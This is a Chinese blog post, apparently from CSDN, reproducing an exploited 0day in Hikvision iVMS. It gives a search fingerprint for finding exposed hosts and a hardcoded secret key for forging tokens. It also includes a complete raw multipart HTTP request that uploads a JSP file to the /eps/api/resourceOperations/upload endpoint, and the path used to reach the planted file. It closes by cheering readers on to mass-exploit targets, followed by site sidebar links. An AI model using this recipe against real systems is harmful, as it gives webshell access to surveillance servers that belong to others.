海康威视iVMS系统在野 0day漏洞复现

已于 2023-05-26 11:59:55 修改
阅读量2.1k 收藏 2
点赞数 5
文章标签: web安全 安全
于 2023-05-26 11:09:12 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_46371267/article/details/130882819
版权

漏洞概述

简介:海康威视iVMS系统存在在野 0day 漏洞,攻击者通过获取密钥任意构造token,请求/resourceOperations/upload接口任意上传文件,导致获取服务器webshell权限,同时可远程进行恶意代码执行。

hunter指纹

web.icon==“3670cbb1369332b296ce44a94b7dd685”

漏洞复现

漏洞url:/eps/api/resourceOperations/upload
检测脚本PoC:https://github.com/sccmdaveli/hikvision-poc

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-8dWQYCDE-1685070423570)(D:\桌面\day\image-20230525201837124.png)]

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-2DlFd9sb-1685070423571)(D:\桌面\day\image-20230525202141120.png)]

可以看到需要token,这俩token需要用url+secretkey的md5值进行绕过

http://url/eps/api/resourceOperations/uploadsecretKeyIbuilding

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-fwquC35f-1685070423571)(D:\桌面\day\image-20230525202257753.png)]

进行上传

POST /eps/api/resourceOperations/upload?token=Token值 HTTP/1.1
Host: xxxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: /
Connection: close
Cookie: ISMS_8700_Sessionname=ABCB193BD9D82CC2D6094F6ED4D81169
Content-Length: 179
Content-Type: multipart/form-data; boundary=f7d1250b2d43db9324c19e1073573ce6

–f7d1250b2d43db9324c19e1073573ce6
Content-Disposition: form-data; name=“fileUploader”; filename=“1.jsp”
Content-Type: image/jpeg

test
–f7d1250b2d43db9324c19e1073573ce6–

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-xP831n4H-1685070423571)(D:\桌面\day\image-20230525202502872.png)]

访问路径http://url/eps/upload/uid.jsp

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-EStTtkST-1685070423572)(D:\桌面\day\image-20230525202547005.png)]

然后就可以愉快的刷洞了

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-ujRVhzzx-1685070423572)(D:\桌面\day\image-20230525202646095.png)]
更为详细链接为:https://blog.csdn.net/qq_41904294/article/details/130807691

Fa1hai1
关注
  • 5
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
0day复现海康威视综合安防管理平台信息泄露(内网集权账户密码)漏洞
记录并分享学习安全的知识点..
10-17 2142
HIKVISION iSecure Center综合安防管理平台是一套“集成化”、“智能化”的平台,通过接入视频监控、一卡通、停车场、报警检测等系统的设备,海康威视综合安防管理平台信息存在信息泄露(内网集权账户密码)漏洞,可以通过解密软件,解密用户名密码。 ​
HiKVISION 综合安防管理平台 env信息泄漏漏洞,2024年最新网络安全源码剖析之Framwork层消息传递
2301_76225520的博客
04-13 726
Hikvision是一家在中国颇具影响力的安防公司,其网络摄像头产品在市场上占据了相当大的份额。综合安防管理平台基于“统一软件技术架构”理念设计,采用业务组件化技术,满足平台在业务上的弹性扩展。
Nday 海康综合安防管理平台存在多个漏洞、29个漏洞合集
最新发布
weixin_43167326的博客
06-04 1044
海康威视部分综合安防管理平台管理平台基于 " 统一软件技术架构" 理念设计,采用业务组件化技术,满足平台在业务上的弹性扩展。该平台适用于全行业通用综合安防业务,对各系统资源进行了整合和集中管理,实现统一部署、配置、管理和调度,可以对接入的视频监控点集中管理,实现统一部署、统一配置、统一管理和统一调度。
海康威视 0day_海康威视摄像机壁装支架DS-1292ZJ 海康白 压铸铝合金材质
weixin_39777540的博客
10-22 569
DS-1292ZJ 海康威视压铸铝合金材质海康白摄像机壁装支架 适合枪型/筒型/一体型壁装摄像机支架 支架带出线孔,安装更加美观 DS-1292ZJ DS-1292ZJ(海康白) 海康壁装摄像机支架 海康壁装摄像机支架 DS-1292ZJ(海康白) 主要特性: 压铸铝合金材质,表面做喷塑处理 支架带出线孔,安装更加美观 摄像机安装座表面有海绵垫,保证和摄像机底座结合更紧密 摄像机安装座可旋...
海康威视 0day_海康威视向公益组织开放AI能力,将与世界自然基金会合作
weixin_39721924的博客
10-30 104
10月23日,海康威视启动“STAR公益伙伴计划”,宣布向各类公益组织免费开放AI能力,帮助其开展创新公益活动,世界自然基金会(WWF)成为该计划首个战略合作伙伴。STAR公益伙伴计划发布现场“人工智能、大数据等技术已成为开展公益项目的创新手段。”海康威视自然生态行业解决方案工程师沈锦程表示,基于AI开放平台训练的识别算法,已经可以实现对大中型哺乳动物、鸟类等野生动物的快速检测、分类、记...
海康威视 0day_清华紫光原厂3D TLC颗粒初体验,海康威视C2000 PRO 2TB版体验
weixin_39937635的博客
10-23 324
前言近来感觉原有M.2的固态空间实在太小了,所以很想换个更大容量的M.2固态。目前市面上1TB的M.2固态还是比较多的,但是2TB的M.2固态就比较少了。正好之前看到了海康威视C2000 PRO 2TB版在做活动,所以就入手了。看中这款主要还是因为价格,我是准备放系统、软件和游戏,而且这款M.2固态有10年质保。老版的C2000 PRO采用的是东芝的颗粒,而新版的海康威视C2000 PRO则是清华...
海康威视 0day_某拼又有车了,海康威视固态万人团,不管好不好听我别急着上车...
weixin_39844590的博客
10-23 163
Hello大家好,我是兼容机之家的咖啡。海康威视是全球领先的以视频为核心的物联网解决方案提供商,致力于不断提升视频处理技术和视频分析技术,面向全球提供领先的监控产品和技术解决方案。但是这么一个做监控安防的企业跨行做起了固态,并且因为价格便宜,提供十年保修而被大家熟知,要知道传统品牌最多也不过五年质保。现在拼夕夕上面搞起了万人团活动,价格已然是近期的最低价,但是,是不是官方搞得我们就不得而知,以至于...
海康威视iVMS-4200 Video Wall 2.6.17.5客户端
11-29
海康威视iVMS-4200 Video Wall是一款专为视频监控系统设计的客户端软件,主要用于管理和显示监控画面。版本2.6.17.5是该软件的一个更新迭代,提供了更稳定、高效的功能。以下是关于这个系统的一些详细知识点: 1. *...
海康威视 IVMS-8700综合管理平台操作手册
09-18
海康威视 IVMS-8700综合管理平台操作手册,门禁、考勤、安防、访客、车辆管理系统、消费系统等综合软件平台
海康威视iVMS-4200客户端,mac电脑M1芯片可以用
05-16
海康威视iVMS-4200是一款专业级的视频监控管理软件,专为用户提供全面、高效、便捷的视频监控解决方案。该客户端适用于多种操作系统,包括Windows和Mac OS。在苹果Mac电脑上,尤其是那些搭载了最新M1芯片的设备,...
海康威视IVMS-8700车底检测系统操作指南
03-24
海康威视IVMS-8700平台车底检测系统客户端操作指南,客户端软件说明书。
海康威视iVMS综合安防系统任意文件上传漏洞复现 (0day)
qq_50854662的博客
06-30 2352
海康威视iVMS综合安防系统任意文件上传漏洞复现0day
0day复现海康威视综合安防管理平台SSRF服务器端请求伪造漏洞
记录并分享学习安全的知识点..
08-12 621
HIKVISION iSecure Center综合安防管理平台是一套“集成化”、“智能化”的平台,通过接入视频监控、一卡通、停车场、报警检测等系统的设备,康威视综合安防管理平台SSRF服务器端请求伪造漏洞
海康威视iVMS综合安防系统任意文件上传(0Day)
失心少年
08-11 2121
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!攻击者通过请求/svm/api/external/report接口任意上传文件,导致获取服务器webshell权限,同时可远程进行恶意代码执行。2.链接马径:/portal/ui/login/…
某购物商城系统commodtiy接口处存在任意文件上传漏洞
weixin_43167326的博客
05-10 768
某购物商城系统commodtiy接口处存在任意文件上传漏洞,恶意攻击者可以上传恶意软件,例如后门、木马或勒索软件,以获取对服务器的远程访问权限或者破坏系统,对服务器造成极大的安全隐患。
海康威视iVMS综合安防系统任意文件上传漏洞复现0day
热门推荐
0xSec
05-22 1万+
海康威视iVMS系统存在在野 0day 漏洞,攻击者通过获取密钥任意构造token,请求/resourceOperations/upload接口任意上传文件,导致获取服务器webshell权限,同时可远程进行恶意代码执行。
漏洞复现海康威视iVMS综合安防系统任意文件上传漏洞复现 (在野0day)
做自己喜欢的事,并将其发挥到极致!
06-02 1万+
海康威视 iVMS 集中监控应用管理平台,是以安全防范业务应用为导向,以视频图像应用为基础手段,综合视频监控、连网报警、智能分析、运维管理等多种安全防范应用系统,构建的多业务应用综合管理平台。海康威视 iVMS系统存在在野利用 0day漏洞,攻击者可通过获取密钥任意构造token,请求/resourceOperations/upload 接口任意上传文件,导致获取服务器WebShell权限,同时可远程进行恶意代码执行。
海康威视漏洞合集
weixin_46626737的博客
07-03 4115
解密脚本地址:https://github.com/chrisjd20/hikvision_CVE-2017-7921_auth_bypass_config_decryptor。操作技巧:/api/video/v2/cameras/previewURLs,访问是否返回rtsp数据流地址,若返回,访问就是摄像头。poc检测工具地址:https://github.com/sccmdaveli/hikvision-poc漏洞版本:大多数设备。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值